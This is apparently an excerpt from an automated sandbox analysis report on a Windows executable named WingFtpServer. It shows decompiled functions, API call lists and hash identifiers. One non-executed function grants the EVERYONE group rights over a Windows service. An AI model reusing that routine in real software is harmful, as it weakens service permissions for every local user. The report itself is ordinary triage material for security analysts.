                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileLibraryLoadModuleName
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1159719554-0
                                                                                                                                                                                                  • Opcode ID: a6ad7dc94966992a8e2560c2d01973d506bfa5f8c9abed22f1b6db6bd139c7fb
                                                                                                                                                                                                  • Instruction ID: d08f19db0852b6909b857a1d1f6416275cdb1191de203358a4c04484fd3744fc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6ad7dc94966992a8e2560c2d01973d506bfa5f8c9abed22f1b6db6bd139c7fb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96118236A44B1CAFDB11EB58CD95BDD73B8EB09300F5144BAA408A7750DB709F84CA95
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AA5650 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 219 3aa5650-3aa566e call 3aa55e4 VirtualAlloc 222 3aa56be-3aa56c9 219->222 223 3aa5670-3aa56bd 219->223
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AA5650(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E03AA55E4(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x3bd3af4 = 0;
					return 0;
				} else {
					_t10 =  *0x3bd3ae0; // 0x3de0000
					_t14 = _t4;
					 *_t14 = 0x3bd3adc;
					 *0x3bd3ae0 = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x3bd3af4 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x3bd3af0 = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                                                                                                                                                                  0x03aa5652
                                                                                                                                                                                                  0x03aa5654
                                                                                                                                                                                                  0x03aa5667
                                                                                                                                                                                                  0x03aa566e
                                                                                                                                                                                                  0x03aa56c0
                                                                                                                                                                                                  0x03aa56c9
                                                                                                                                                                                                  0x03aa5670
                                                                                                                                                                                                  0x03aa5670
                                                                                                                                                                                                  0x03aa5676
                                                                                                                                                                                                  0x03aa5678
                                                                                                                                                                                                  0x03aa567e
                                                                                                                                                                                                  0x03aa5683
                                                                                                                                                                                                  0x03aa5686
                                                                                                                                                                                                  0x03aa568a
                                                                                                                                                                                                  0x03aa5695
                                                                                                                                                                                                  0x03aa56a2
                                                                                                                                                                                                  0x03aa56aa
                                                                                                                                                                                                  0x03aa56ac
                                                                                                                                                                                                  0x03aa56b9
                                                                                                                                                                                                  0x03aa56bd
                                                                                                                                                                                                  0x03aa56bd

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,03AA5C67,000000FF,03AA620C,00000000,03AAE153,00000000,03AAE699,00000000,03AAE95B,00000000), ref: 03AA5667
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                  • String ID: @.
                                                                                                                                                                                                  • API String ID: 4275171209-4201455939
                                                                                                                                                                                                  • Opcode ID: 5aac1ac48d6648e26d496c453955848ec8902b2c8d49bc9d1876209112defce0
                                                                                                                                                                                                  • Instruction ID: d93746c5f344da7917bbfe2fd712dfe2d97507b10f0c2cfb9514c5d093095866
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5aac1ac48d6648e26d496c453955848ec8902b2c8d49bc9d1876209112defce0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3F08CB6F023114FD714EF789A51745BBD4A705358B15417EE94DEBB89E7B188008784
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03AAC4E8 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 233 3aac4e8-3aac4f6 234 3aac4f8-3aac50f GetModuleFileNameW call 3aad774 233->234 235 3aac523-3aac52e 233->235 237 3aac514-3aac51b 234->237 237->235 238 3aac51d-3aac520 237->238 238->235
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E03AAC4E8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x3aa0000
					GetModuleFileNameW( *_t3,  &_v532, 0x20a);
					_t14 = E03AAD774(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						_t5 = _t16 + 4; // 0x3aa0000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x3aa0000
				return  *_t7;
			}












                                                                                                                                                                                                  0x03aac4f0
                                                                                                                                                                                                  0x03aac4f2
                                                                                                                                                                                                  0x03aac4f6
                                                                                                                                                                                                  0x03aac502
                                                                                                                                                                                                  0x03aac506
                                                                                                                                                                                                  0x03aac50f
                                                                                                                                                                                                  0x03aac514
                                                                                                                                                                                                  0x03aac516
                                                                                                                                                                                                  0x03aac51b
                                                                                                                                                                                                  0x03aac51d
                                                                                                                                                                                                  0x03aac520
                                                                                                                                                                                                  0x03aac520
                                                                                                                                                                                                  0x03aac51b
                                                                                                                                                                                                  0x03aac523
                                                                                                                                                                                                  0x03aac52e

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(03AA0000,?,0000020A), ref: 03AAC506
                                                                                                                                                                                                    • Part of subcall function 03AAD774: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,03AAD82E,?,03AA0000,03BCEC1C), ref: 03AAD7B0
                                                                                                                                                                                                    • Part of subcall function 03AAD774: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,03AAD82E,?,03AA0000,03BCEC1C), ref: 03AAD801
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName$LibraryLoad
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4113206344-0
                                                                                                                                                                                                  • Opcode ID: 501834dea3654184c50dffef8a818409901cf0462aec5719360875e2ee063d11
                                                                                                                                                                                                  • Instruction ID: 441ee8a9ebb395c50098a48d9596b6bcf6f22f3341caebee847b3dd047014e9b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 501834dea3654184c50dffef8a818409901cf0462aec5719360875e2ee063d11
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41E0EDB6A007109BDF14DF5CD9C4A5637E8AB09664F044A96AD54CF346E371DA108BD1
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 03BC4598 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 151memoryserviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                                  			E03BC4598(void* __ebx, void* __edi, void* __esi, char _a4) {
				struct _SECURITY_DESCRIPTOR _v8;
				struct _ACL* _v12;
				struct _ACL* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v60;
				struct _SECURITY_DESCRIPTOR _v92;
				char* _t67;
				void* _t83;
				intOrPtr _t86;
				int _t88;
				void* _t90;
				void* _t93;

				E03AA9D20( &_a4);
				_push(_t93);
				_push(0x3bc472a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93 + 0xffffffa8;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_t90 = OpenSCManagerW(0, 0, 0xf003f);
				if(_t90 == 0) {
					L16:
					_pop(_t86);
					 *[fs:eax] = _t86;
					_push(E03BC4731);
					return E03AA9C64( &_a4);
				}
				_t83 = OpenServiceW(_t90, E03AAA724(_a4), 0x60000);
				if(_t83 != 0) {
					if(QueryServiceObjectSecurity(_t83, 4,  &_v8, 0,  &_v28) != 0) {
						L7:
						if(GetSecurityDescriptorDacl(_v8,  &_v20,  &_v12,  &_v24) != 0) {
							_push(0);
							_push(2);
							_push(0x20030);
							_push(L"EVERYONE");
							_push( &_v60);
							L03BC4588();
							_push( &_v16);
							_push(_v12);
							_t67 =  &_v60;
							_push(_t67);
							_push(1);
							L03BC4590();
							if(_t67 == 0 && InitializeSecurityDescriptor( &_v92, 1) != 0 && SetSecurityDescriptorDacl( &_v92, 0xffffffff, _v16, 0) != 0) {
								SetServiceObjectSecurity(_t83, 4,  &_v92);
							}
						}
						L12:
						CloseServiceHandle(_t90);
						CloseServiceHandle(_t83);
						if(_v16 != 0) {
							LocalFree(_v16);
						}
						if(_v8 != 0) {
							HeapFree(GetProcessHeap(), 0, _v8);
						}
						goto L16;
					}
					if(GetLastError() != 0x7a) {
						goto L12;
					}
					_t88 = _v28;
					_v8 = HeapAlloc(GetProcessHeap(), 8, _t88);
					if(_v8 == 0 || QueryServiceObjectSecurity(_t83, 4, _v8, _t88,  &_v28) == 0) {
						goto L12;
					} else {
						goto L7;
					}
				} else {
					CloseServiceHandle(_t90);
					goto L16;
				}
			}

















                                                                                                                                                                                                  0x03bc45a4
                                                                                                                                                                                                  0x03bc45ab
                                                                                                                                                                                                  0x03bc45ac
                                                                                                                                                                                                  0x03bc45b1
                                                                                                                                                                                                  0x03bc45b4
                                                                                                                                                                                                  0x03bc45b9
                                                                                                                                                                                                  0x03bc45be
                                                                                                                                                                                                  0x03bc45c3
                                                                                                                                                                                                  0x03bc45c8
                                                                                                                                                                                                  0x03bc45cd
                                                                                                                                                                                                  0x03bc45d2
                                                                                                                                                                                                  0x03bc45e3
                                                                                                                                                                                                  0x03bc45e7
                                                                                                                                                                                                  0x03bc4714
                                                                                                                                                                                                  0x03bc4716
                                                                                                                                                                                                  0x03bc4719
                                                                                                                                                                                                  0x03bc471c
                                                                                                                                                                                                  0x03bc4729
                                                                                                                                                                                                  0x03bc4729
                                                                                                                                                                                                  0x03bc4601
                                                                                                                                                                                                  0x03bc4605
                                                                                                                                                                                                  0x03bc4626
                                                                                                                                                                                                  0x03bc4669
                                                                                                                                                                                                  0x03bc4680
                                                                                                                                                                                                  0x03bc4682
                                                                                                                                                                                                  0x03bc4684
                                                                                                                                                                                                  0x03bc4686
                                                                                                                                                                                                  0x03bc468b
                                                                                                                                                                                                  0x03bc4693
                                                                                                                                                                                                  0x03bc4694
                                                                                                                                                                                                  0x03bc469c
                                                                                                                                                                                                  0x03bc46a0
                                                                                                                                                                                                  0x03bc46a1
                                                                                                                                                                                                  0x03bc46a4
                                                                                                                                                                                                  0x03bc46a5
                                                                                                                                                                                                  0x03bc46a7
                                                                                                                                                                                                  0x03bc46ae
                                                                                                                                                                                                  0x03bc46db
                                                                                                                                                                                                  0x03bc46e0
                                                                                                                                                                                                  0x03bc46ae
                                                                                                                                                                                                  0x03bc46e2
                                                                                                                                                                                                  0x03bc46e3
                                                                                                                                                                                                  0x03bc46e9
                                                                                                                                                                                                  0x03bc46f2
                                                                                                                                                                                                  0x03bc46f8
                                                                                                                                                                                                  0x03bc46f8
                                                                                                                                                                                                  0x03bc4701
                                                                                                                                                                                                  0x03bc470f
                                                                                                                                                                                                  0x03bc470f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03bc4701
                                                                                                                                                                                                  0x03bc4630
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03bc4636
                                                                                                                                                                                                  0x03bc4647
                                                                                                                                                                                                  0x03bc464e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03bc4607
                                                                                                                                                                                                  0x03bc4608
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03bc4608

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 03AA9D20: SysAllocStringLen.OLEAUT32(?,?), ref: 03AA9D2E
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,03BC472A), ref: 03BC45DE
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00060000,00000000,00000000,000F003F,00000000,03BC472A), ref: 03BC45FC
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00060000,00000000,00000000,000F003F,00000000,03BC472A), ref: 03BC4608
                                                                                                                                                                                                  • QueryServiceObjectSecurity.ADVAPI32(00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000,00000000,000F003F,00000000,03BC472A), ref: 03BC461F
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000,00000000,000F003F,00000000,03BC472A), ref: 03BC4628
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000,00000000,000F003F,00000000,03BC472A), ref: 03BC463C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000,00000000,000F003F,00000000,03BC472A), ref: 03BC4642
                                                                                                                                                                                                  • QueryServiceObjectSecurity.ADVAPI32(00000000,00000004,00000000,?,?,00000000,00000008,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000), ref: 03BC4660
                                                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000,00000000,000F003F,00000000), ref: 03BC4679
                                                                                                                                                                                                  • BuildExplicitAccessWithNameW.ADVAPI32(?,EVERYONE,00020030,00000002,00000000,?,?,?,?,00000000,00000004,?,00000000,?,00000000,00000000), ref: 03BC4694
                                                                                                                                                                                                  • SetEntriesInAclW.ADVAPI32(00000001,?,?,?,?,EVERYONE,00020030,00000002,00000000,?,?,?,?,00000000,00000004,?), ref: 03BC46A7
                                                                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000001,?,?,?,?,EVERYONE,00020030,00000002,00000000,?,?,?,?,00000000), ref: 03BC46B6
                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,?,00000000,?,00000001,00000001,?,?,?,?,EVERYONE,00020030,00000002,00000000,?), ref: 03BC46CB
                                                                                                                                                                                                  • SetServiceObjectSecurity.ADVAPI32(00000000,00000004,?,?,000000FF,?,00000000,?,00000001,00000001,?,?,?,?,EVERYONE,00020030), ref: 03BC46DB
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000,00000000,000F003F), ref: 03BC46E3
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,?,?,?,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000,00000000), ref: 03BC46E9
                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000,00000000), ref: 03BC46F8
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000004,?,00000000,?,00000000,00000000,00060000), ref: 03BC4709
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000004,?,00000000,?,00000000,00000000), ref: 03BC470F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$Security$Heap$CloseDescriptorHandleObject$AllocDaclFreeOpenProcessQuery$AccessBuildEntriesErrorExplicitInitializeLastLocalManagerNameStringWith
                                                                                                                                                                                                  • String ID: EVERYONE
                                                                                                                                                                                                  • API String ID: 498919520-4237530456
                                                                                                                                                                                                  • Opcode ID: e3536a07bab5b6fec287c3cac2f6920c03a8a908e5fd6283920f956020fff4a7
                                                                                                                                                                                                  • Instruction ID: 2e4f4462a510c5ca16cd9b10364df8b34860315e79fc61d65f60091e5fcd70d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3536a07bab5b6fec287c3cac2f6920c03a8a908e5fd6283920f956020fff4a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06413F75A10348BEEB21EAE5CE91FEFB7FCDB05604F1449B7A604EA181E670DA408760
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 03BC4964 Relevance: 16.6, APIs: 11, Instructions: 85servicesleepwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                                                  			E03BC4964(void* __ebx, char _a4) {
				char _v5;
				void* _v12;
				void* _v16;
				short* _v20;
				intOrPtr _v44;
				struct _SERVICE_STATUS _v48;
				char _v76;
				MSG* _t42;
				intOrPtr _t45;
				void* _t47;
				void* _t48;
				intOrPtr _t49;

				_t47 = _t48;
				_t49 = _t48 + 0xffffffb8;
				E03AA9D20( &_a4);
				_t42 =  &_v76;
				_push(_t47);
				_push(0x3bc4a6a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49;
				_v16 = OpenSCManagerW(0, 0, 1);
				_v12 = OpenServiceW(_v16, E03AAA724(_a4), 0x34);
				_push(_t47);
				_push(0x3bc4a4d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49;
				if(StartServiceW(_v12, 0,  &_v20) == 0) {
					_v5 = 0;
					L12:
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(E03BC4A54);
					CloseServiceHandle(_v12);
					return CloseServiceHandle(_v16);
				}
				while(QueryServiceStatus(_v12,  &_v48) != 0) {
					Sleep(0x1f4);
					while(PeekMessageW(_t42, 0, 0, 0, 1) != 0) {
						TranslateMessage(_t42);
						DispatchMessageW(_t42);
					}
					if(_v44 != 2) {
						break;
					}
					Sleep(0x1f4);
				}
				if(_v44 != 4) {
					_v5 = 0;
				} else {
					_v5 = 1;
				}
				goto L12;
			}















                                                                                                                                                                                                  0x03bc4965
                                                                                                                                                                                                  0x03bc4967
                                                                                                                                                                                                  0x03bc496e
                                                                                                                                                                                                  0x03bc4973
                                                                                                                                                                                                  0x03bc4978
                                                                                                                                                                                                  0x03bc4979
                                                                                                                                                                                                  0x03bc497e
                                                                                                                                                                                                  0x03bc4981
                                                                                                                                                                                                  0x03bc498f
                                                                                                                                                                                                  0x03bc49a6
                                                                                                                                                                                                  0x03bc49ab
                                                                                                                                                                                                  0x03bc49ac
                                                                                                                                                                                                  0x03bc49b1
                                                                                                                                                                                                  0x03bc49b4
                                                                                                                                                                                                  0x03bc49c8
                                                                                                                                                                                                  0x03bc4a29
                                                                                                                                                                                                  0x03bc4a2d
                                                                                                                                                                                                  0x03bc4a2f
                                                                                                                                                                                                  0x03bc4a32
                                                                                                                                                                                                  0x03bc4a35
                                                                                                                                                                                                  0x03bc4a3e
                                                                                                                                                                                                  0x03bc4a4c
                                                                                                                                                                                                  0x03bc4a4c
                                                                                                                                                                                                  0x03bc4a06
                                                                                                                                                                                                  0x03bc49d1
                                                                                                                                                                                                  0x03bc49e4
                                                                                                                                                                                                  0x03bc49d9
                                                                                                                                                                                                  0x03bc49df
                                                                                                                                                                                                  0x03bc49df
                                                                                                                                                                                                  0x03bc49fa
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x03bc4a01
                                                                                                                                                                                                  0x03bc4a01
                                                                                                                                                                                                  0x03bc4a1b
                                                                                                                                                                                                  0x03bc4a23
                                                                                                                                                                                                  0x03bc4a1d
                                                                                                                                                                                                  0x03bc4a1d
                                                                                                                                                                                                  0x03bc4a1d
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 03AA9D20: SysAllocStringLen.OLEAUT32(?,?), ref: 03AA9D2E
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001,00000000,03BC4A6A), ref: 03BC498A
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4A6A), ref: 03BC49A1
                                                                                                                                                                                                  • StartServiceW.ADVAPI32(?,00000000,?,00000000,03BC4A4D,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4A6A), ref: 03BC49C1
                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,00000000,?,00000000,03BC4A4D,?,?,00000000,00000034,00000000,00000000,00000001,00000000), ref: 03BC49D1
                                                                                                                                                                                                  • PeekMessageW.USER32 ref: 03BC49ED
                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4,?,00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000000,00000001,000001F4,?,?,?), ref: 03BC4A01
                                                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(?,?,?,00000000,?,00000000,03BC4A4D,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4A6A), ref: 03BC4A0E
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?,03BC4A54,00000000,03BC4A4D,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4A6A), ref: 03BC4A3E
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?,?,03BC4A54,00000000,03BC4A4D,?,?,00000000,00000034,00000000,00000000,00000001,00000000,03BC4A6A), ref: 03BC4A47
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000012.00000002.560034828.0000000003AA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 03AA0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000012.00000002.560012432.0000000003AA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564276492.0000000003BCE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564291693.0000000003BCF000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564306803.0000000003BD0000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564378271.0000000003BD8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564420194.0000000003BDB000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564445349.0000000003BDC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564462184.0000000003BDD000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000012.00000002.564485538.0000000003BDF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_3aa0000_WingFtpServer.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandleOpenSleep$AllocManagerMessagePeekQueryStartStatusString
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 822939-0
                                                                                                                                                                                                  • Opcode ID: 757090cb02351df411a46c82c8257f575b5a73ee85a62fbe5bd48a1d91c13753
